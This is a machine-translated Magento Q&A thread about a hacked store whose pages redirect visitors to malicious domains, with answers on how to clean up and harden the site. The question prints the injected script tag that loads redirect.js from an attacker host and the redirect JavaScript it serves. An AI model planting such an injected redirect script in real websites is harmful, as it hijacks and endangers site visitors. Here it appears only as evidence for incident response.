Redirection du site Web vers une autre URL

9

Maybe it's infected by some virus.

Mon site Web commence à rediriger vers ces URL infectées.

http://mon.setsu.xyz
et un certain temps https://tiphainemollard.us/index/?1371499155545
Liens infectés

ce que j'ai fait pour résoudre.

  1. Fichier .htaccess commenté (rien ne se passe)
  2. Dossier inclus commenté (rien ne se passe)
  3. Serveur complet analysé (rien ne se produit, aucun logiciel malveillant viral n'a été trouvé)
  4. Chemin CSS, média et js modifié depuis la base de données juste pour s'assurer que la météo de son PHP ou de tout js fait (rien ne se passe)
  5. select * from core_config_data where path like '%secure%';tous les liens sont ok MISE À JOUR

J'ai googlé et de nombreux articles ont été écrits à ce sujet, mais ils suggèrent qu'il s'agissait d'un problème de navigateur ou que mon système est infecté. Un article à ce sujet même si j'ouvre le site sur mon téléphone ou sur mon ordinateur portable, les problèmes sont les mêmes.

MISE À JOUR 2

J'ai trouvé la ligne de la base de données qui est affectée. (comme Boris K. le dit également)

Dans la valeur du core_config_data tableau design/head/includes, un

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

Qui sera inséré dans la section d'en-tête lors du chargement de la page.

Si vous visitez l'URL ci-dessus, vous obtiendrez un script de redirection qui est

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

Le site Web client fonctionne à partir de l'après-midi une fois que j'ai supprimé ce script. But the main problem is how that script inserted into the database.

Un patch est également obsolète, j'ai donc mis à jour ce patch également.

MISE À JOUR 3 Le site est à nouveau infecté. Il s'agit du script inséré dans la section Admin ( Admin-> Configuration-> General-> Design-> HTML Head-> Miscellaneous Script ) administrateur

Et dans la colonne de la base de données base de données

Je ne sais plus quoi faire maintenant. Comme j'ai changé chaque mot de passe, j'ai supprimé tous les anciens utilisateurs.

MISE À JOUR 3

Jusqu'à présent, cette erreur ne vient pas, donc cela signifie qu'en suivant les étapes ci-dessus, nous pouvons résoudre ce problème.

MISE À JOUR :: 4 Installez toujours les correctifs car cela m'aide dans les projets à rendre le magasin moins sujet à ce type de problèmes et les correctifs sont également importants. On peut utiliser https://magescan.com/ pour vérifier les problèmes sur leur site Web.

inrsaurabh
la source
dans votre système peut être affecté, veuillez le vérifier. vérifiez votre navigateur.
Rama Chandran M
@RamaChandran quand je google à propos de cette URL, presque toutes les suggestions que c'était un problème de navigateur. J'ai ouvert le site dans mon téléphone également le même problème.
inrsaurabh
Veuillez fournir l'URL de votre site Web
Rama Chandran M
1
J'ai supprimé <script src = "<a href =" melissatgmt.us/redirect_base/redirect.js " > https : //… > "id =" 1371499155545 "> </script> de design / head / includes. Ça n'a toujours pas fonctionné. Et après avoir visité mon site Web, ce code javascrip réapparaît. Avez-vous une idée? L'adresse du site Web est hdvideodepot.com
Mark
1
Pouvez-vous s'il vous plaît ajouter une balise de version magento?
sv3n

Réponses:

6

J'ai trouvé le code injecté dans le core_config_datatableau, sous design/head/includes. Supprimé et maintenant le site est revenu à la normale.

MISE À JOUR: Comme tout le monde l'a mentionné, cela s'est reproduit ce matin. Cette fois, je m'en suis débarrassé plus facilement depuis le panneau d'administration sous System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. C'est une énorme vulnérabilité, j'espère que Magento travaille sur un patch.

MISE À JOUR 2: Le script est revenu, j'ai donc changé le mot de passe db, effacé le cache. Environ une heure plus tard, le script est de retour. Je ne pense donc pas qu'il soit ajouté via la base de données. Je viens de changer mon mot de passe administrateur, voyons s'il revient.

MISE À JOUR 3: Depuis que j'ai changé le mot de passe administrateur hier sur mes deux sites concernés, environ 24 heures plus tard, les deux sont toujours propres.

Boris K.
la source
2
wow, c'est une énorme faille de sécurité, une idée du type de vulnérabilité qui l'a provoquée?
Yehia A.Salam
3
Doit être un trou dans les anciennes versions de Magento. J'ai un site construit sur Magento 2.1 qui n'a pas été affecté, mais chaque site en dessous de la version 2 est redirigé.
Boris K.
Il s'agit d'un énorme problème de sécurité. Est-ce que quelqu'un sait comment le code a été injecté dans la table? Ce tableau est l'endroit où, à partir de la zone d'administration, nous pouvons ajouter des styles et du javascript au pied de page / en-tête du site Web. Comment un pirate pourrait-il compromettre cela? Cela signifie-t-il qu'ils avaient accès à l'administrateur?
Peanuts
il continue de revenir après sa suppression, je ne sais pas quoi faire
Yehia A.Salam
J'ai détecté des utilisateurs malveillants sur Système> Autorisations> Utilisateurs. Après les avoir supprimés (et précédemment corrigé la table core_config_data et changé le mot de passe de l'administrateur), il semble stable, mais j'aimerais savoir comment cela s'est produit en premier lieu. Le trou / porte dérobée est peut-être toujours là et c'est un mystère.
Peanuts
3

Même problème sur un autre site magento. J'ai découvert qu'un script est injecté dans la section HEAD de la page, demandant redirect_base / redirect.js à melissatgmt.us (puis changé vers un autre domaine) mais je ne peux pas comprendre comment cette merde est injectée.

MISE À JOUR : Comme mentionné par d'autres, a trouvé l'entrée dans la table core_config_data et l'a supprimée mais l'enregistrement était de retour au rechargement de la page suivante. J'ai changé le mot de passe db et maintenant il semble être vaincu. Je ne suis pas sûr que le changement de mot de passe soit la solution ultime mais est de toute façon une amélioration de la sécurité.

MISE À JOUR 2 : Comme indiqué par Jix Sas, l'accès à partir de la configuration dans l'administration magento est une solution plus facile que l'accès direct à la table de base de données. Mais la merde revient toujours toutes les 10/15 minutes.

MISE À JOUR 3 : Modification du mot de passe administrateur, vérification et enregistrement de certaines pages cms (service client et à propos de nous) qui semblaient être infectées, cache désactivé, cache nettoyé plusieurs fois (après chaque vérification et enregistrement de la page cms `` infectée '') non plus de script injecté au cours des 8 dernières heures.

ConsuLanza Informatica
la source
Oui, tu as raison, j'ai la ligne qui est affectée.
inrsaurabh
Notez que l'administrateur magento est accessible sans problème et dans le journal Web, je peux voir que les accès aux bots ne sont pas affectés. Je pense que le malware est limité à l'interface et vérifie l'agent utilisateur du navigateur.
ConsuLanza Informatica
alors saviez-vous d'où il a été injecté?
Yehia A.Salam
oui, je peux confirmer qu'il revient toujours toutes les 10/15 minutes, même après avoir supprimé l'entrée de la base de données
Yehia A.Salam
2

J'ai changé le chemin vers le panneau d'administration app/etc/local.xmlet cela aide. Le script n'est plus ajouté à design/head/includes.

Explication:

Dans le app/etc/local.xmlj'ai changé, <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>c'était auparavant sitedomain.com/admin, et maintenant le chemin vers le panneau d'administration sera sitedomain.com/new_admin_path

Eugenia
la source
Désolé de ne pas vous avoir donné ce que vous avez fait, veuillez expliquerwhich path u chagned
inrsaurabh
Dans l'application / etc / local.xml, j'ai changé <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Auparavant, il s'agissait de sitedomain.com/admin, et maintenant le chemin vers le panneau d'administration sera sitedomain.com/new_admin_path
Eugenia
Ok j'ai compris ce que vous suggérez
inrsaurabh
1

C'est un gros soulagement, j'ai restauré mon site 10 fois depuis le matin.

Le bug continue de revenir encore et encore.

Quelle est la solution ultime?

Changer le mot de passe DB? Changer le mot de passe root? Un correctif est-il publié?

Je ne sais pas si cela est lié J'ai reçu ci-dessous un e-mail d'un consultant en sécurité

Cher Monsieur ou Madame,

Nous sommes Hatimeria, une société de développement Magento basée en Suisse, en Pologne et aux Pays-Bas.

Récemment, nous avons commencé à travailler avec un nouveau client et avons repris son ancien serveur. Au moment où nous avons accédé au serveur, nous sommes tombés sur un logiciel malveillant, avec lequel les pirates ont pu prendre le contrôle du serveur du client et l'utiliser comme une «machine de pirates» pour pirater d'autres sites Web. Bien sûr, le client ne savait pas que cela se passait sur son serveur.

Nous avons trouvé les informations d'identification de la base de données de votre site Web qui ont été piratées via ce serveur. Bien sûr, nous n'en ferons rien, mais je me sens obligé de vous contacter et de vous informer de ce qui se passe. Le piratage a été effectué via la vulnérabilité Magento Cacheleak, qui pourrait encore être présente sur votre boutique en ce moment.

Je vous conseille de prendre immédiatement en charge cette vulnérabilité et de changer le mot de passe de votre base de données. Nos techniciens disent que cela devrait prendre environ 30 minutes.

Sur le site Web MageReport, vous pouvez voir à quoi d'autre votre site Web pourrait être vulnérable: https://www.magereport.com/scan/?s=

Mon intention principale de cet e-mail n'est pas de faire une acquisition client, mais si vous avez besoin d'aide pour sécuriser votre magasin ou si vous avez d'autres questions, nous sommes heureux de vous aider.

Cordialement, Thomas Tanner

Donc je suppose que la solution est de changer le mot de passe de la base de données

Mohit Khatri
la source
1

Nous devons comprendre quelle est la principale cause de ces injections de spam

Si votre site a été injecté, veuillez vérifier votre site sur TOUS LES TROIS analyses de logiciels malveillants

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

J'ai le sentiment que cela est dû à un patch de sécurité manquant! Si vous voyez un patch manquant, signalez-le sous ce sujet .

  1. Changer le mot de passe d'accès à l'hébergement Changer le mot de passe de la base de données Changer les mots de passe de connexion administrateur MASQUER L'ADMINISTRATION ET TÉLÉCHARGER les URL et masquer / RSS / de la vue publique.

  2. Effectuez une analyse antivirus complète du site, votre hébergeur peut analyser le site si vous ne pouvez pas le faire vous-même.

  3. Accédez à Sysytem -> Utilisateurs et voyez s'il y a des utilisateurs enregistrés NON AUTORISÉS sur le compte.

Icône
la source
0

J'ai résolu le problème. Même après avoir supprimé ce fichier <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>de la core_config_datatable en design/head/includesvaleur. Cela n'a pas résolu le problème. le code du script a été inséré encore et encore. Pour résoudre le problème, suivez simplement ces trois étapes.

  1. Supprimez le code de script de la core_config_datatable dans design/head/includes.
  2. Modifiez le mot de passe de la base de données, y compris les app/etc/local.xmlinformations d'identification.
  3. Vider le cache dans le dossier Magento racine à l'aide de cette commande rm -rf var/cache/*

ps j'ai passé toute la journée. J'espère que cela fonctionnera pour vous. Et assurez-vous de sauvegarder le fichier tout le temps.

marque
la source
0

cette même chose m'est arrivée juste aujourd'hui! redirection vers le même site Web. cependant, j'ai trouvé le script dans le panneau d'administration de Magento sous configuration> conception> tête html> scripts divers. il y avait ce script: <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> je l'ai retiré de là et le site fonctionne bien. je n'ai pas le dossier dans lequel vous avez dit que vous avez trouvé le script. Une idée où il pourrait être? (comme vous connaissez le chemin vers la tête HTML> scripts divers)

aussi, qu'avez-vous fait récemment? peut-être que nous pouvons comprendre la cause? pour moi, j'ai installé une popup de newsletter gratuite qui peut être la cause. Et toi?

MISE À JOUR: bien maintenant le script est de retour. Quelqu'un me dit comment puis-je accéder à ce script de la base de données pour le supprimer s'il vous plaît?

MISE À JOUR 2: comme indiqué par Mark, la suppression du script ET la modification du mot de passe de la base de données ont empêché ce script de revenir. Si quelqu'un connaît le nom de cette vulnérabilité ou s'il existe un danger pour le paiement des clients, veuillez nous le faire savoir.

جيلبير
la source